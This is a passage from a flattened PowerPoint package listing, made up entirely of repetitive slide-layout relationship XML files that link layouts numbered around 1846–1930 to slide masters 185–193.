<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster185.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1847.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster185.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1848.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster185.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1849.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster185.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout18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850.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster185.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1851.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1852.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1853.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1854.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1855.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1856.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1857.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1858.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1859.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout18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860.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster186.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1861.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1862.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1863.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1864.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1865.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1866.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1867.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1868.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1869.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout18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870.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster187.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1871.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1872.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1873.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1874.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1875.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1876.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1877.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1878.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1879.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout18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880.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster188.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1881.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1882.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1883.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1884.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1885.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1886.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1887.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1888.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1889.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout18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890.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster189.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1891.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1892.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1893.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1894.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1895.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1896.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1897.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1898.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1899.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.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900.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster190.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1901.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1902.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1903.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1904.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1905.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1906.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1907.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1908.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1909.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout19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910.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster191.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1911.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1912.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1913.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1914.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1915.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1916.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1917.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1918.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1919.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout19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920.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster192.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1921.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1922.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1923.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1924.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1925.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1926.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1927.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1928.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1929.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout19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930.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster193.xml"/></Relationships>
</file>

